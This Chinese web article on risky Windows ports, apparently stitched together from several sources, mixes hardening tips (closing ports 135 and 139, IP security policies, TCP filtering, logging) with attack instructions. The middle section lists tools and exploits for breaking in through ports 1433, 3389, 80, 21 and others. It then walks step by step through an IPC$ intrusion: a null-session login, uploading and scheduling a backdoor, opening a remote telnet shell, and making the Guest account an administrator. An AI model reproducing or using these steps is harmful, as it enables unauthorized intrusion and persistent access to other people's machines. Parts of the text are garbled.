哪些端口会有危险

删除是不行的，只能选择关闭这些危险的容易被病毒攻击的端口。
关闭被攻击端口
1、关闭135端口
Windows xp服务器的135端口都是默认开启的，利用防火墙阻断外网连接服务器端口已经被黑客的反向连接技术破解，真正斩草除根的办法是用利用16位编辑软件(譬如UItraEdit)打开系统的C:\Winnt\system32或者C:\Windows\system32下的rpcssdll文件。查找3100330035，替换为3000300030，然后保存，要另存为，文件是受到Windows保护的，不能直接保存。重启计算机后，用启动盘启动到DOS状态下，进入C盘后运行：copyrpcssdll C:\Windows\system32\rpcssdll，然后重新启动机器，就会发现135端口已经没有了，这样修改其实就是把监听的端口从135改到0。
2、关闭139端口
开始→设置→网络连接→本地连接→属性→internet协议(tcp/ip)→属性→高级→Wins→禁用tcp/ip上的netbios→确定→确定→关闭，重新启动电脑后就会发现139已经不再Listening了。关了这个之后就不能用文件和打印共享了。

关闭危险的COM组件
1、卸载wscriptshell对象
在cmd下运行：regsvr32 WSHomOcx/u
2、卸载FSO对象
在cmd下运行：regsvr32exescrrundll/u’

反劫持启动项
1、在运行中输入：MSCONFIG清理所有与服务不相关的启动项。
2、利用hijackthis扫描系统启动程序(由于黑客可以通过修改策略组启动能瞒过msconfig的检测)，关闭后门启动项。

构件备用日志纪录
由于大多黑客在入侵结束后都会清理入侵痕迹(删除LOG文件)，可以利用一个bat(批处理)实现双重监控。
新建一个aabat文件输入：
time/t>>aalog注：(纪录用产登录时间)
netstat-n-p tcp 10>>aalog注：(记录登录用户IP地址并在每10秒钟自动刷新一次TCP的连接情况。)
保存后利用软件策略设置为随开机启动。
当黑客远程连接计算机后，aalog日志中将记录攻击是什么时候发生的。
图中显示：攻击者于8:40对服务器发出连接申请
攻击者IP为：20299144112
攻击者连接了TCP：3389端口进程远程登录(3389是默认的远程管理端口)

22端口是高危端口怎么办
电脑端口的一些使用技巧相信大家都可能有一定的了解，通过控制各个端口，可以有效的控制电脑中各种程序的运行，通过关闭相应的端口，就可以停止电脑某些程序的运行。
高危端口TCP/UDP 135
TCP/UDP135端口用于RPC(远程过程调用)服务。攻击者可以利用此端口远程打开对方的telnet服务，用于启动与远程计算机的RPC连接，通过RPC可以执行远程计算机上的代码。
高危端口137 138 139 445
这几个端口都是为共享而开的，非法入侵者通过139、445这个端口进入的连接，能够获得NetBIOS/SMB服务权限，这是IPC$入侵的主要通道。139端口基于SMB协议提供共享服务，445端口基于CIFS协议提供共享服务;非法入侵者通过向137端口发送连接请求，可能获得目标主机的相关名称信息，例如目标主机的计算机名称、注册该目标主机的用户信息以及目标主机是否是作为文件服务器或主域控制器来使用;138端口的主要作用是提供NetBIOS环境下的计算机名浏览功能，非法入侵者与主机的138端口建立连接请求就能轻松获得目标主机所处的局域网名称以及目标主机的计算机名称

1 1433端口入侵
scanportexe 查有1433的机器
SQLScanPassexe 进行字典暴破（字典是关键）
最后 SQLToolsexe入侵
对sql的sp2及以下的系统，可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口 sqlhelloFexe 入侵ip 1433 本机ip 本机端口
（以上反向的，测试成功）
sqlhellozexe 入侵ip 1433 （这个是正向连接）
2 4899端口入侵
用4899过滤器exe，扫描空口令的机器
3 3899的入侵
对很早的机器，可以试试3389的溢出(win3389exexe)
对2000的机器，可以试试字典暴破。(tscrackexe)
4 80入侵
对sp3以前的机器，可以用webdav入侵；
对bbs论坛，可以试试上传漏洞（upfileexe或dvup_delphiexe）
可以利用SQL进行注入。
5 serv-u入侵(21端口）
对5 004及以下系统，可用溢出入侵。（serv5004exe）
对5100及以下系统，可用本地提升权限。（servlocalexe）
对serv-u的MD5加密密码，可以用字典暴破。（crackvbs）
输入一个被serv-u加密的密码（34位长），通过与字典档（dicttxt）的比较，得到密码
6 554端口
用real554exe入侵。
7 6129端口
用DameWare6129exe入侵。
8 系统漏洞
利用135、445端口，用ms03026、ms03039、ms03049、ms04011漏洞，
进行溢出入侵。
9 3127等端口
可以利用doom病毒开的端口，用nodoomexe入侵。（可用mydoomscanexe查）。
10 其他入侵
利用shanlu的入侵软件入侵
经典IPC$入侵
1 C:\>net use $">\\127001\IPC$ "" /user:"admintitrators"
这是用"流光"扫到的用户名是administrators，密码为"空"的IP地址(气好到家如果是打算攻击的话，就可以用这样的命令来与127001建立一个连
接，因为密码为"空"，所以第一个引号处就不用输入，后面一个双引号里的是用户名
，输入administrators，命令即可成功完成。
2 C:\>copy srvexe $">\\127001\admin$
先复制srvexe上去，在流光的Tools目录下就有（这里的$是指admin用户的
c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。
3 C:\>net time \\127001
查查时间，发现127001 的当前时间是 2002/3/19 上午 11:00，命令成功完成。
4 C:\>at \\127001 11:05 srvexe
用at命令启动srvexe吧（这里设置的时间要比主机时间快，不然你怎么启动啊
5 C:\>net time \\127001
再查查到时间没有？如果127001 的当前时间是 2002/3/19 上午 11:05，那就准备
开始下面的命令。
6 C:\>telnet 127001 99
这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的
是SRV在对方计算机中为我们建立一个99端口的Shell。
虽然我们可以Telnet上去了，但是SRV是一次性的，下次登录还要再激活！所以我们打
算建立一个Telnet服务！这就要用到ntlm了
7C:\>copy ntlmexe $">\\127001\admin$
用Copy命令把ntlmexe上传到主机上（ntlmexe也是在《流光》的Tools目录中）。
8 C:\WINNT\system32>ntlm
输入ntlm启动（这里的C:\WINNT\system32>指的是对方计算机，运行ntlm其实是让这
个程序在对方计算机上运行）。当出现"DONE"的时候，就说明已经启动正常。然后使
用"net start telnet"来开启Telnet服务！
9 Telnet 127001，接着输入用户名与密码就进入对方了， *** 作就像在DOS上 *** 作
一样简单！
为了以防万一,我们再把guest激活加到管理组
10 C:\>net user guest /active:yes
将对方的Guest用户激活
11 C:\>net user guest 1234
将Guest的密码改为1234,或者你要设定的密码
12 C:\>net localgroup administrators guest /add
将Guest变为Administrator^_^(如果管理员密码更改，guest帐号没改变的话，下次可以用guest再次访问这台计算机)

利用Windows服务器自身的IP安全策略功能，来自定义一个拦截135端口的安全策略。

a打开控制面板，找到管理工具里面的本地安全设置。
b我们选择左边的IP安全策略，在本地机器。
然后在右边空白处单击右键，选择创建IP安全策略。出现了一个设置向导。点击下一步
名称也是看自己喜欢了，我们还是叫拦截135端口~下一步
去掉激活默认响应规则的勾，下一步
点击完成，我们就创建好了，
接下来设置我们用这个规则来干什么，我们是拦截135端口所以添加一个IP安全规则，单击添加（不需要向导所以去掉添加向导的勾）
在IP筛选器列表中，我们添加一个新的。单击添加
在这个对话框中名称还是自定义，去掉添加向导的勾，然后单击添加
准备开始设置规则了：）
在寻址标签中，设置：
源地址：任何IP地址
目标地址：我的IP地址
在协议标签中，设置：
选择协议类型：TCP
设置IP协议端口:

从任意端口，到此端口：135
确定后可以看到筛选器中多出了一条。关闭后在IP筛选器列表中选择我们刚刚建立的拦截135端口。
我们建立好了可是电脑还不知道我们要怎么使用这个规则，不要紧，只要在筛选器 *** 作标签中添加一个 *** 作就完成了~
单击添加只用在安全措施种选择阻止就ok了（可以在描述中设置名称）
同样选上这个 *** 作。确定后我们就完成了99%！
由于windows默认IP安全策略中的项目是没有激活的，所以我们要指派一下，点击指派。完成999%
重新启动！100%
其它的端口设置类似，多试试看~

PS:如果没有IP安全策略可以在控制台中新建
在运行中输入：mmc回车
然后在控制台按钮中选择添加删除管理单元
然后单击添加
在其中选择：IP安全策略，再添加即可，这时的 *** 作就和上面一样了。
方法 3 筛选TCP端口

我们还可以利用Windows系统的筛选TCP端口功能，将来自于135网络端口的数据包，全部过滤掉。
先打开“Internet协议(TCP/IP)”属性设置对话框
可以在控制面板中的网络连接找到本地连接，打开，点击属性。
选择TCP/IP协议，再单击属性
在右下脚找到高级，单击进入后找到选项标签，选择其中的TCP/IP筛选，进入属性
选中启用TCP/IP筛选选项，同时在TCP端口处，选中只允许，并单击添加按钮，填入常用的21，23，80，110端口，最后单击确定按钮，这样的话其余端口就会被自动排除了。
以后如果要添加或者删除都可以同样 *** 作。

系统安全：
1设置较为复杂的主机密码，建议8位数以上，大小写混合带数字、特殊字符，不要使用123456、password等弱口令。
2开启系统自动更新功能，定期给系统打补丁。
3windows主机安装安全狗、360主机卫士等防入侵的产品。
4做好网站的注入漏洞检查，做好网站目录访问权限控制。(建议将网站设置为只读状态，对需要上传附件等目录单独开通写权限功能，对上传文件目录设置为禁止脚本执行权限)
5如果用于网站服务，建议安装我们预装“网站管理助手”的 *** 作系统模板，该系统我们做过安全加固，比纯净版要更安全。新建网站强烈建议用网站管理助手创建，本系统创建的网站会相互隔离，避免一个网站被入侵就导致其他网站也受影响。
6关闭不需要的服务，如server,worksation等服务一般用不上，建议禁用。
7启用TCP/IP筛选功能,关闭危险端口,防止远程扫描、蠕虫和溢出攻击。 比如mssql数据库的1433端口，一般用不上远程连接的话，建议封掉，只允许本机连接。
8如果自己安装数据库，建议修改为普通用户运行，默认是system权限运行的，非常不安全。查看帮助
9如果是自主安装纯净版的系统，建议修改掉3389、22等默认端口，用其他非标准端口可以减少被黑的几率。

---